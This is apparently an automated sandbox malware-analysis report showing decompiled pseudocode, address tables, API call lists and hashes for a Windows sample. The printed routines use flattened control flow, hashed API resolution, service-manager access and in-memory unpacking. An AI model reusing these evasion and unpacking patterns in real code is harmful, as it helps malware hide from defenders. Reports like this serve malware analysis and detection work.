                                                        0x007b5386
                                                        0x007b538d
                                                        0x007b538f
                                                        0x007b5394
                                                        0x007b5396
                                                        0x007b53a9
                                                        0x007b53ae
                                                        0x007b53ae
                                                        0x00000000
                                                        0x007b53b7
                                                        0x007b5072
                                                        0x007b5078
                                                        0x007b50f9
                                                        0x007b50ff
                                                        0x007b5153
                                                        0x007b5158
                                                        0x007b515a
                                                        0x007b516d
                                                        0x007b5172
                                                        0x007b5172
                                                        0x007b5179
                                                        0x007b517b
                                                        0x007b5180
                                                        0x007b5182
                                                        0x007b5195
                                                        0x007b519a
                                                        0x007b519a
                                                        0x007b51a3
                                                        0x007b51a5
                                                        0x00000000
                                                        0x007b5101
                                                        0x007b5101
                                                        0x007b5107
                                                        0x00000000
                                                        0x007b510d
                                                        0x007b510d
                                                        0x007b5112
                                                        0x007b5114
                                                        0x007b5127
                                                        0x007b512c
                                                        0x007b512c
                                                        0x007b5139
                                                        0x007b513b
                                                        0x007b513d
                                                        0x007b514b
                                                        0x007b505c
                                                        0x007b505c
                                                        0x00000000
                                                        0x007b505c
                                                        0x007b505c
                                                        0x007b5107
                                                        0x007b507a
                                                        0x007b507a
                                                        0x007b50c2
                                                        0x007b50c7
                                                        0x007b50c9
                                                        0x007b50dc
                                                        0x007b50e1
                                                        0x007b50e1
                                                        0x007b50ed
                                                        0x00000000
                                                        0x007b507c
                                                        0x007b5082
                                                        0x007b50ad
                                                        0x007b50b0
                                                        0x007b50b2
                                                        0x007b50ba
                                                        0x00000000
                                                        0x007b5084
                                                        0x007b508a
                                                        0x00000000
                                                        0x007b5090
                                                        0x007b509a
                                                        0x007b50a8
                                                        0x007b505c
                                                        0x007b505c
                                                        0x00000000
                                                        0x007b505c
                                                        0x007b505c
                                                        0x007b508a
                                                        0x007b5082
                                                        0x007b507a
                                                        0x00000000
                                                        0x007b5078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,007B8AC8,?,3251FEFE,?,?), ref: 007B5355
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 598d17c8ce5e32aad2545cd1cc6e041858eb04a2e273cf572102bdc7b1e06a01
                                                        • Instruction ID: 9a417a9a93b5b5597251702d96158d4c94f77f3e9bb287fa144e1a90c120d6ad
                                                        • Opcode Fuzzy Hash: 598d17c8ce5e32aad2545cd1cc6e041858eb04a2e273cf572102bdc7b1e06a01
                                                        • Instruction Fuzzy Hash: E181F431B047158BDB24AF7C9C99BEA36DAAB90744F01452AF851DB391EA3CDD404BC5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 73%
                                                        			E007B9860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x7be310;
                                                        							if( *0x7be310 == 0) {
                                                        								 *0x7be310 = E007B3E60(_t64, E007B3F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x7be54c; // 0x54e0e0
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x7bdbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E007B3E60(_t64, E007B3F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x7bdbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x7be54c; // 0x54e0e0
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E007B7C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x7be3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E007B3E60(_t64, E007B3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x7be3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E007B3D00( &_v536);
                                                        											_t72 =  *0x7be54c; // 0x54e0e0
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x7bdbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E007B3E60(_t64, E007B3F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x7bdbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x7be54c; // 0x54e0e0
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E007B3040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x7be494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E007B3E60(_t64, E007B3F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x7be494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x7bdd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E007B3E60(_t64, E007B3F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x7bdd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x7be54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E007B7E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x7be18c;
                                                        								if( *0x7be18c == 0) {
                                                        									 *0x7be18c = E007B3E60(_t64, E007B3F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x7be54c; // 0x54e0e0
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x7b7e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x007b9868
                                                        0x007b986a
                                                        0x007b9871
                                                        0x007b9875
                                                        0x007b9875
                                                        0x007b9878
                                                        0x007b9880
                                                        0x007b9880
                                                        0x007b9880
                                                        0x007b9880
                                                        0x007b9885
                                                        0x00000000
                                                        0x00000000
                                                        0x007b988b
                                                        0x007b9993
                                                        0x007b9995
                                                        0x007b99ad
                                                        0x007b99ad
                                                        0x007b99bb
                                                        0x007b99bd
                                                        0x007b99bf
                                                        0x007b99c1
                                                        0x007b99d8
                                                        0x007b99c3
                                                        0x007b99c3
                                                        0x007b99c8
                                                        0x007b99ce
                                                        0x007b99ce
                                                        0x00000000
                                                        0x007b9891
                                                        0x007b9891
                                                        0x007b9896
                                                        0x007b9936
                                                        0x007b993b
                                                        0x00000000
                                                        0x007b9941
                                                        0x007b9941
                                                        0x007b9947
                                                        0x007b9949
                                                        0x007b9961
                                                        0x007b9963
                                                        0x007b9963
                                                        0x007b9969
                                                        0x007b997d
                                                        0x007b997f
                                                        0x007b9981
                                                        0x007b9986
                                                        0x00000000
                                                        0x007b9986
                                                        0x007b989c
                                                        0x007b989c
                                                        0x007b9927
                                                        0x007b992c
                                                        0x00000000
                                                        0x007b98a2
                                                        0x007b98a7
                                                        0x007b9905
                                                        0x007b990d
                                                        0x007b9912
                                                        0x007b991a
                                                        0x00000000
                                                        0x007b98a9
                                                        0x007b98ae
                                                        0x00000000
                                                        0x007b98b4
                                                        0x007b98b4
                                                        0x007b98bb
                                                        0x007b98ce
                                                        0x007b98d3
                                                        0x007b98d3
                                                        0x007b98e4
                                                        0x007b98ea
                                                        0x007b98ef
                                                        0x007b98f5
                                                        0x007b98fb
                                                        0x00000000
                                                        0x007b98fb
                                                        0x007b98ae
                                                        0x007b98a7
                                                        0x007b989c
                                                        0x007b9896
                                                        0x00000000
                                                        0x007b988b
                                                        0x007b99e2
                                                        0x007b99e7
                                                        0x007b9ae3
                                                        0x007b9ae8
                                                        0x007b9b02
                                                        0x007b9b07
                                                        0x007b9b09
                                                        0x007b9b1c
                                                        0x007b9b21
                                                        0x007b9b21
                                                        0x007b9b33
                                                        0x007b9b35
                                                        0x007b9b3e
                                                        0x007b9b3e
                                                        0x007b9b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x007b99ed
                                                        0x007b99ed
                                                        0x007b9a73
                                                        0x007b9a78
                                                        0x007b9a7a
                                                        0x007b9a8d
                                                        0x007b9a92
                                                        0x007b9a92
                                                        0x007b9a99
                                                        0x007b9a9b
                                                        0x007b9aa0
                                                        0x007b9aa2
                                                        0x007b9ab5
                                                        0x007b9aba
                                                        0x007b9aba
                                                        0x007b9ac7
                                                        0x007b9ac9
                                                        0x007b9ace
                                                        0x007b9ad0
                                                        0x007b9b4f
                                                        0x007b9b58
                                                        0x007b9ad2
                                                        0x007b9ad2
                                                        0x007b9ad9
                                                        0x00000000
                                                        0x007b9ad9
                                                        0x007b99f3
                                                        0x007b99f3
                                                        0x007b99f8
                                                        0x007b9a47
                                                        0x007b9a49
                                                        0x007b9a61
                                                        0x007b9a61
                                                        0x007b9a67
                                                        0x007b9a69
                                                        0x00000000
                                                        0x007b99fa
                                                        0x007b99fa
                                                        0x007b99ff
                                                        0x00000000
                                                        0x007b9a05
                                                        0x007b9a05
                                                        0x007b9a0d
                                                        0x007b9a12
                                                        0x007b9a17
                                                        0x007b9a1f
                                                        0x007b9a24
                                                        0x007b9a2c
                                                        0x007b9a31
                                                        0x007b9a38
                                                        0x00000000
                                                        0x007b9a38
                                                        0x007b99ff
                                                        0x007b99f8
                                                        0x007b99ed
                                                        0x00000000
                                                        0x007b9aea
                                                        0x007b9aea
                                                        0x007b9aea
                                                        0x007b9b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,0054E0C8), ref: 007B997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 007B99BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 007B9A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 007B9B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 2S$Y4[0$T
                                                        • API String ID: 2382770032-999769056
                                                        • Opcode ID: 8803cdf2c72d0bcaf2fa83a528ffda3a95f6eafbbd65c4d79f1398e3ba7f7142
                                                        • Instruction ID: 86f30c8585ef52f5537199d6ffb75d05915b0388794965e5e05e07202b4e44d8
                                                        • Opcode Fuzzy Hash: 8803cdf2c72d0bcaf2fa83a528ffda3a95f6eafbbd65c4d79f1398e3ba7f7142
                                                        • Instruction Fuzzy Hash: 3661F5307042058BEB28AF68AC99BFA7295DBD1704F10842DF315DB391EA3CDD45C796
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 7b8400-7b84df 106 7b84e3-7b84e9 105->106 107 7b85c8-7b85ce 106->107 108 7b84ef 106->108 109 7b8630-7b8637 107->109 110 7b85d0-7b85d6 107->110 111 7b866c-7b86b4 call 7bb6e0 108->111 112 7b84f5-7b84fb 108->112 113 7b8639-7b864f call 7b3f00 call 7b3e60 109->113 114 7b8654-7b8667 109->114 115 7b85d8-7b85e0 110->115 116 7b85b1-7b85b7 110->116 121 7b85bd-7b85c7 111->121 134 7b86ba 111->134 117 7b854a-7b8551 112->117 118 7b84fd-7b8503 112->118 113->114 114->106 124 7b85e2-7b85fa call 7b3f00 call 7b3e60 115->124 125 7b8600-7b8624 CreateFileW 115->125 116->106 116->121 122 7b856e-7b8591 117->122 123 7b8553-7b8569 call 7b3f00 call 7b3e60 117->123 126 7b8543-7b8548 118->126 127 7b8505-7b850b 118->127 148 7b85ae 122->148 149 7b8593-7b85a9 call 7b3f00 call 7b3e60 122->149 123->122 124->125 125->121 135 7b8626-7b862b 125->135 126->106 127->116 133 7b8511-7b8518 127->133 139 7b851a-7b8530 call 7b3f00 call 7b3e60 133->139 140 7b8535-7b8541 133->140 142 7b86bc-7b86be 134->142 143 7b86c4-7b86d1 134->143 135->106 139->140 140->106 142->121 142->143 148->116 149->148
                                                        C-Code - Quality: 66%
                                                        			E007B8400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E007BB6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x7bdec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E007B3F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E007B3E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x7bdec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x7bde3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E007B3F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E007B3E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x7bde3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x7be1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E007B3F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E007B3E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x7be1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x7be3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E007B3F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E007B3E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x7be3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x7bde04;
                                                        							if( *0x7bde04 == 0) {
                                                        								_t95 = E007B3F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x7bde04 = E007B3E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x007b8400
                                                        0x007b8400
                                                        0x007b8406
                                                        0x007b840e
                                                        0x007b8416
                                                        0x007b841e
                                                        0x007b8426
                                                        0x007b842b
                                                        0x007b8430
                                                        0x007b8438
                                                        0x007b8440
                                                        0x007b8445
                                                        0x007b844a
                                                        0x007b8452
                                                        0x007b845a
                                                        0x007b8462
                                                        0x007b846a
                                                        0x007b8472
                                                        0x007b847a
                                                        0x007b8482
                                                        0x007b8491
                                                        0x007b8496
                                                        0x007b849a
                                                        0x007b84a2
                                                        0x007b84af
                                                        0x007b84b3
                                                        0x007b84bb
                                                        0x007b84c3
                                                        0x007b84cb
                                                        0x007b84cf
                                                        0x007b84d7
                                                        0x007b84df
                                                        0x007b84df
                                                        0x007b84e3
                                                        0x007b84e3
                                                        0x007b84e3
                                                        0x007b84e3
                                                        0x007b84e9
                                                        0x00000000
                                                        0x00000000
                                                        0x007b84ef
                                                        0x007b866e
                                                        0x007b8676
                                                        0x007b8696
                                                        0x007b869a
                                                        0x007b86a2
                                                        0x007b86a6
                                                        0x007b86aa
                                                        0x007b86b2
                                                        0x007b86b4
                                                        0x00000000
                                                        0x007b86ba
                                                        0x007b86ba
                                                        0x007b86c5
                                                        0x007b86d1
                                                        0x007b86bc
                                                        0x007b86bc
                                                        0x007b86be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x007b86be
                                                        0x007b86ba
                                                        0x007b84f5
                                                        0x007b84fb
                                                        0x007b854a
                                                        0x007b854f
                                                        0x007b8551
                                                        0x007b8558
                                                        0x007b855d
                                                        0x007b8564
                                                        0x007b8569
                                                        0x007b8569
                                                        0x007b8578
                                                        0x007b857c
                                                        0x007b857e
                                                        0x007b8589
                                                        0x007b858f
                                                        0x007b8591
                                                        0x007b8598
                                                        0x007b859d
                                                        0x007b85a4
                                                        0x007b85a9
                                                        0x007b85a9
                                                        0x007b85af
                                                        0x00000000
                                                        0x007b84fd
                                                        0x007b8503
                                                        0x007b8543
                                                        0x00000000
                                                        0x007b8505
                                                        0x007b850b
                                                        0x00000000
                                                        0x007b8511
                                                        0x007b8511
                                                        0x007b8518
                                                        0x007b851f
                                                        0x007b8524
                                                        0x007b852b
                                                        0x007b8530
                                                        0x007b8530
                                                        0x007b853a
                                                        0x007b853c
                                                        0x00000000
                                                        0x007b853c
                                                        0x007b850b
                                                        0x007b8503
                                                        0x007b84fb
                                                        0x00000000
                                                        0x007b84ef
                                                        0x007b85c8
                                                        0x007b85ce
                                                        0x007b8630
                                                        0x007b8635
                                                        0x007b8637
                                                        0x007b863e
                                                        0x007b8643
                                                        0x007b864a
                                                        0x007b864f
                                                        0x007b864f
                                                        0x007b8660
                                                        0x007b8662
                                                        0x00000000
                                                        0x007b85d0
                                                        0x007b85d0
                                                        0x007b85d6
                                                        0x00000000
                                                        0x007b85d8
                                                        0x007b85de
                                                        0x007b85e0
                                                        0x007b85e7
                                                        0x007b85ec
                                                        0x007b85fa
                                                        0x007b85fa
                                                        0x007b861d
                                                        0x007b861f
                                                        0x007b8621
                                                        0x007b8624
                                                        0x00000000
                                                        0x007b8626
                                                        0x007b8626
                                                        0x00000000
                                                        0x007b8626
                                                        0x007b8624
                                                        0x007b85d6
                                                        0x00000000
                                                        0x007b85b1
                                                        0x007b85b1
                                                        0x007b85b1
                                                        0x007b85bd
                                                        0x007b85bd
                                                        0x007b85c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 007B861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: ccda62bd42f02e425506a9a40392457b9d6f617e214e413248e23ec35a42d382
                                                        • Instruction ID: a2809c0d74ac991d42bfb87e0830b122ebcdcd3676dd5af62ffc891945b986d3
                                                        • Opcode Fuzzy Hash: ccda62bd42f02e425506a9a40392457b9d6f617e214e413248e23ec35a42d382
                                                        • Instruction Fuzzy Hash: 6D61B271A083119FC768DF68C455BABB7E9AB90714F00891DF4959B290EB7CDD44CB83
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 7a0d60-7a0dd5 call 7a0ed0 VirtualAlloc RtlMoveMemory 164 7a0ddb-7a0dde 160->164 165 7a0ebe-7a0ec4 160->165 164->165 166 7a0de4-7a0de6 164->166 166->165 167 7a0dec-7a0df0 166->167 167->165 169 7a0df6-7a0dfd 167->169 170 7a0eaf-7a0ebb 169->170 171 7a0e03-7a0e36 call 7a1140 RtlMoveMemory 169->171 171->165 175 7a0e3c-7a0e4a VirtualAlloc 171->175 176 7a0e89-7a0ea0 RtlFillMemory 175->176 177 7a0e4c-7a0e52 175->177 176->165 183 7a0ea2-7a0ea5 176->183 178 7a0e5a-7a0e68 177->178 179 7a0e54-7a0e56 177->179 178->165 180 7a0e6a-7a0e7d RtlMoveMemory 178->180 179->178 180->165 182 7a0e7f-7a0e83 180->182 182->165 184 7a0e85 182->184 183->165 185 7a0ea7-7a0ea9 183->185 184->176 185->170 185->171
                                                        APIs
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 007A0F08
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 007A0F3E
                                                          • Part of subcall function 007A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 007A0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 007A0DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 007A0DC3
                                                          • Part of subcall function 007A1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,007A0EFD,00000000), ref: 007A1155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 007A0E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 007A0E3D
